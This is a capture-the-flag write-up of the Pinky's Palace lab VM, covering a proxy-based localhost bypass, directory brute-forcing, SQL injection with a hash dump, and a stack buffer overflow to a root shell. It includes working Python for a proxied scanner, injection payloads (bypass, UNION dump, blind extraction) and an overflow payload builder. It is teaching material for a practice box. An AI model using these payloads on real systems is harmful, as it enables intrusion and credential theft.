A friend of mine tipped me off to this awesome website that hosts vulnerable VMs for security engineers to practice hacking into. Not only does it promote learning new skills, it also keeps your old skills sharp for future pentests.
Today I found a VM called Pinky’s Palace that required me to learn how to turn a box’s own proxy against it, so that its web server thinks the request is coming from itself. Here’s how I did it.
When the VM boots, you see this screen. It gives you the IP of the victim box and which flag you need to read. Unfortunately, that is as far as you can get from the console.
I launched an nmap scan. Since I owned the box and didn’t need to worry about getting caught, I set it to the fastest scan possible to save time (-T5 is the most aggressive timing template and can miss ports on a lossy network, but on a lab VM it is fine). The command I used is
nmap -O -sV -sT -T5 -p- 10.29.9.33, i.e. OS detection, service versions and a full TCP connect scan of all 65535 ports. We found a few open ports and services. We knew that
8080 is open and running an nginx web server,
31337 is running a Squid proxy server, and
64666 is running SSH.
When trying to reach port 8080 in the web browser you get a 401 for every URL. Looks like the box only allows local connections. hmmmmm…
We can test this with curl!
By sending the request through the box’s own Squid proxy (curl -x 10.29.9.33:31337 http://127.0.0.1:8080/), nginx sees a connection from 127.0.0.1 and serves the landing page: as far as the web server can tell, the box is asking itself. In a real deployment this would be a terrible way to lock down a web server. The localhost-only rule keeps legitimate users out, while the open proxy on the same host hands the bypass to anyone who finds it; an allow-list on source address is only as strong as everything else that can originate traffic from that address.
Next step is to find something to attack, or at least map the file structure of the web server. There are a few ways to do this, but I’m going with the easiest, automated way: dirb, a web content scanner that brute-forces directories and files behind a web page.
Using one of the wordlists that ship with Kali, we can see what directories exist behind the landing page. dirb sends an HTTP request for each word (through the same proxy, via its -p option, or nginx refuses us again). A 200 means there is something there; a 404 means nothing, and it moves on to the next word. A 301 or 403 is also worth a look, since it means the path exists even if we can’t read it. We came back with a directory called “littlesecrets-main” with “login.php” and “logs.php” behind it. A PHP login page needs a database, and the one that usually sits behind nginx and PHP is MySQL.
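To make the proxy trick and the dirb-style scan concrete, here is an added example (not code from the original post) showing what curl puts on the wire when you give it -x, and a small directory brute-forcer driven through the same proxy. The proxy address 10.29.9.33:31337 and the target http://127.0.0.1:8080 are taken from the post; the wordlist is a constructed sample, not dirb’s common.txt, and the fetch function is injectable so the scan logic can be exercised without the VM.

```python
"""Added example (not from the original post): what `curl -x proxy URL` sends, plus a
dirb-style directory scan that rides through the same forward proxy.
Assumptions: proxy and target addresses are from the post; SAMPLE_WORDS is constructed."""
import socket
from urllib.parse import urlsplit

PROXY = ("10.29.9.33", 31337)     # Squid, from the nmap output in the post
TARGET = "http://127.0.0.1:8080"  # what nginx must see as the request origin


def build_proxied_request(url: str) -> bytes:
    """A forward proxy expects the *absolute* URL in the request line
    (RFC 7230 section 5.3.2); this is exactly what `curl -x` emits.  The proxy
    then opens its own connection to 127.0.0.1:8080, so nginx sees loopback."""
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    host = parts.netloc
    lines = [
        f"GET {parts.scheme}://{host}{path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: proxy-probe/0.1",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_status(response: bytes) -> int:
    """HTTP status code from a raw response; 0 if the status line is unparseable."""
    first = response.split(b"\r\n", 1)[0]
    try:
        return int(first.split(b" ")[1])
    except (IndexError, ValueError):
        return 0


def fetch_status(url: str, proxy=PROXY, timeout: float = 5.0) -> int:
    """Send one request through the proxy and return the status code."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_proxied_request(url))
        buf = b""
        while b"\r\n\r\n" not in buf:   # headers are all we need
            data = s.recv(4096)
            if not data:
                break
            buf += data
    return parse_status(buf)


# dirb treats 404 as "nothing here" and reports everything else.  A 301/403 is as
# interesting as a 200: the path exists even if we are not allowed to read it.
INTERESTING = {200, 301, 302, 401, 403}


def enumerate_paths(base_url: str, words, fetch=fetch_status) -> dict:
    """dirb-style scan: request base_url/<word>/ for each word and keep the hits.
    `fetch` is injectable so the logic can be tested without a live proxy."""
    hits = {}
    for word in words:
        url = f"{base_url.rstrip('/')}/{word}/"
        code = fetch(url)
        if code in INTERESTING:
            hits[word] = code
    return hits


if __name__ == "__main__":
    # Constructed sample wordlist; a real run uses /usr/share/dirb/wordlists/common.txt
    SAMPLE_WORDS = ["admin", "images", "littlesecrets-main", "backup"]
    try:
        print(enumerate_paths(TARGET, SAMPLE_WORDS))
    except OSError as exc:  # no route to the lab box from here
        print(f"proxy unreachable: {exc}")
```

The request line is the whole trick: a plain `GET / HTTP/1.1` sent to Squid would be rejected, and a request that reaches nginx directly is refused because it arrives from a non-loopback address.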
Now we get to try SQL injections!
I started by running sqlmap to dump all of the tables in the database (sqlmap also has to go through the Squid proxy, via --proxy, to reach port 8080 at all), but there were a bunch of useless ones in there. Once I figured that out, I targeted just the “users” table. Two hours later, I had usernames and what looked like password hashes. The next step was to figure out what the passwords were. You can spend time and effort cracking them with hashcat and a wordlist, but I’m lazy. I plugged them into CrackStation and found one of the hashes in its lookup tables. Work smarter, not harder!
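As an added example (not code from the original post, and not the actual login.php source), the class of flaw sqlmap found behind login.php, reproduced against an in-memory SQLite database so it runs offline: the string-built query next to its parameterized fix, an authentication bypass, a UNION dump of the users table, and the boolean-based blind extraction sqlmap falls back to when nothing is echoed, which is the slow path that turns a dump into a two-hour job. The users table, its two accounts and their unsalted md5 hashes are constructed for the demo.

```python
"""Added example, not code from the original post: SQL injection in a PHP-style login
query, reproduced on SQLite.  Accounts, hashes and schema are constructed for the demo."""
import hashlib
import sqlite3

# constructed sample accounts; "pinkymanage" is only the account name from the post
SAMPLE_USERS = (("admin", "letmein"), ("pinkymanage", "correcthorse"))


def md5hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users (user, pass) VALUES (?, ?)",
                   [(u, md5hex(p)) for u, p in SAMPLE_USERS])
    return db


def login_vulnerable(db, user: str, password: str) -> list:
    """The classic PHP mistake: the username is spliced straight into the SQL text.
    The password is hashed before use, so the username field is the injectable one."""
    sql = (f"SELECT user FROM users WHERE user='{user}' "
           f"AND pass='{md5hex(password)}'")
    return [row[0] for row in db.execute(sql)]


def login_safe(db, user: str, password: str) -> list:
    """Same query with bound parameters: input can never change the query's shape."""
    return [row[0] for row in db.execute(
        "SELECT user FROM users WHERE user=? AND pass=?", (user, md5hex(password)))]


# 1. Authentication bypass: comment out the password check.
BYPASS = "admin' -- "

# 2. UNION-based dump: what sqlmap does when query output is reflected in the page.
#    SQLite concatenates with ||; MySQL, the likely backend on the box, uses CONCAT().
DUMP = "x' UNION SELECT user || ':' || pass FROM users -- "


def dump_users(db) -> list:
    return sorted(login_vulnerable(db, DUMP, "anything"))


HEX = "0123456789abcdef"


def blind_extract_hash(db, user: str, length: int = 32) -> str:
    """Boolean-based blind extraction: one yes/no question per character, using only
    whether the login succeeds.  32 positions x up to 16 guesses = up to 512 requests
    for one md5 hash, each one a round trip through the proxy: this is why a blind
    dump of a whole table takes hours."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            probe = f"{user}' AND substr(pass,{pos},1)='{c}' -- "
            if login_vulnerable(db, probe, "anything"):
                recovered += c
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, BYPASS, "wrong"))
    print("safe  :", login_safe(db, BYPASS, "wrong"))
    print("dump  :", dump_users(db))
    print("blind :", blind_extract_hash(db, "admin") == md5hex("letmein"))
```

Once the hashes are out, an unsalted md5 of a common password is exactly what a lookup service like CrackStation is built for; a salted or slow hash (bcrypt, scrypt, Argon2) would have forced the hashcat route instead.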
I used that password to connect as the user “pinkymanage” over SSH on the non-standard port 64666 (ssh -p 64666 pinkymanage@10.29.9.33).
We have access to the box! Next, we start digging. We know there is already something in the web server’s directory, so let’s start there. We use the command
cd /var/www/html/ to get to the web server’s directory.
We can see the login page, and a comment saying the admin only allows localhost access. Looks like our hunch was right and the proxy trick was the only way in. Inside the littlesecrets-main folder there was another hidden folder, “ultrasecretadminf1l35”, containing a text file and a hidden file.
Looks like the server admin is forgetful and keeps losing the admin password: they base64-encoded an RSA private key and hid it in that directory. No worries! cat piped into base64 -d gives us the original key. (Remember to chmod 600 the decoded key file, or ssh will ignore it when you pass it with -i.)
Now can we use that key to log into the server as the admin user “Pinky”??
Yep. Next step is to find a way to escalate privileges to root so we can read the flag in /root.
We immediately get a hint in Pinky’s home directory: a note saying sudo is hard to configure, next to a helper program, “adminhelper”. Apparently the program is supposed to give the admin a root shell, but all it does is print back whatever text you give it as an argument. Does it call another function with the proper input?
I opened it in a debugger and found a function called spawn. Disassembling it shows that it calls setuid to become root and then executes a shell, so anything run from there runs as root. But main never calls it. How do we get “spawn” to execute???
Let’s look at the main function: THERE IS A BUFFER OVERFLOW! main copies the argument into a fixed-size stack buffer without checking its length. Let’s see what happens when we overflow it.
I fed it increasingly long runs of a single character and found that the overflow starts at 72 bytes: whatever comes next overwrites the saved return address. That means we can put a pointer right after those 72 bytes to get a root shell. To make it easier, I used python to write the full payload to a file. We use backtick command substitution to feed the file’s contents to adminhelper as its argument; the last 6 bytes are the little-endian address of spawn, the function that calls setuid and opens the root shell (a user-space pointer on x86-64 has its two top bytes zero, which is why only 6 bytes matter).
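As an added example (not the exploit script from the original post), the two pieces of tooling behind “72 bytes is where the overflow occurs” and “inject a new pointer”: a cyclic pattern that measures the offset to the saved return address in one crash instead of a run of guesses, and a payload builder that appends the address of spawn in the form argv can carry. OFFSET = 72 is taken from the post; SPAWN_ADDR is a placeholder and must be replaced with the address of spawn read from the disassembly of the real adminhelper.

```python
"""Added example, not the exploit from the original post.  Assumptions: OFFSET comes from
the post; SPAWN_ADDR is a PLACEHOLDER, take the real one from `p spawn` in gdb."""
import string
import struct
import sys

OFFSET = 72            # buffer + saved rbp before the return address (from the post)
SPAWN_ADDR = 0x4006d6  # PLACEHOLDER: read the address of spawn from the real binary


def pattern_create(n: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 8-byte window is unique,
    so the value that lands in the return address identifies its offset exactly."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= n:
                    return bytes(out[:n])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(value, n: int = 20280) -> int:
    """Offset of `value` in the pattern; accepts the bytes seen on the stack or the
    integer gdb shows in a register (little-endian, as x86-64 stores it)."""
    if isinstance(value, int):
        value = struct.pack("<Q", value).rstrip(b"\x00")
    return pattern_create(n).find(value)


def argv_safe_pointer(addr: int):
    """Little-endian pointer with its trailing zero bytes removed.  The payload is
    delivered as a command-line argument, i.e. a C string: an embedded NUL would
    truncate it, while the NUL that terminates the argument writes one zero byte
    past our data for us.  Bytes above that keep whatever was in the saved return
    address, so this works when those bytes are already zero.  Returns None when
    the address has an embedded NUL and cannot be delivered this way."""
    packed = struct.pack("<Q", addr).rstrip(b"\x00")
    return None if b"\x00" in packed else packed


def build_payload(offset: int = OFFSET, addr: int = SPAWN_ADDR) -> bytes:
    """Padding up to the saved return address, then the address of spawn."""
    ptr = argv_safe_pointer(addr)
    if ptr is None:
        raise ValueError(f"{addr:#x} contains an embedded NUL; cannot pass it in argv")
    return b"A" * offset + ptr


if __name__ == "__main__":
    # python3 payload.py > payload ; ./adminhelper "$(cat payload)"
    # sys.stdout.buffer so no text-mode encoding touches the raw bytes
    sys.stdout.buffer.write(build_payload())
```

Run the binary under gdb with `pattern_create(200)` as its argument first; the bytes at the top of the stack (or the value in a register) at the crash go into `pattern_offset`, which should return 72 for this binary. If the crash shows the high bytes of the return address are not already zero, argv cannot deliver the pointer and the input has to go in through a channel that allows NUL bytes instead.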